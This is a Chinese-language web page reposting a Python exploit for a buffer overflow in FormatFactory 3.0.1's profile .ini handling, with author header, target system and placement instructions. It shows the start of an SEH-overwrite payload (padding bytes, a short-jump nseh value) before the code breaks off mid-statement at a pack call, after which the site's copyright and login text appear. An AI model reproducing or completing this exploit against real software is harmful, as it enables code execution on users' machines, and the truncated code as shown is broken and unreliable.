# FormatFactory v3.0.1 Profile File Handling 緩衝區溢出漏洞
==EXP==
#!/usr/bin/python
# Exploit Title: FormatFactory v3.0.1 Profile File Handling Buffer Overflow
# Version: <= 3.0.1
# Date: 2012-11-19
# Author: Julien Ahrens (@MrTuxracer)
# Homepage: http://www.inshell.net
# Software Link: http://www.pcfreetime.com
# Tested on: Windows XP SP3 Professional German
# Notes: -
# Howto: Copy .ini to %USERPROFILE%\My Documents\FormatFactory\PicCustom
from struct import pack
file="profile.ini"
junk1="\xCC" * 260
nseh="\xeb\x06\x90\x90"
eip=pack('
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END













请登录后查看评论内容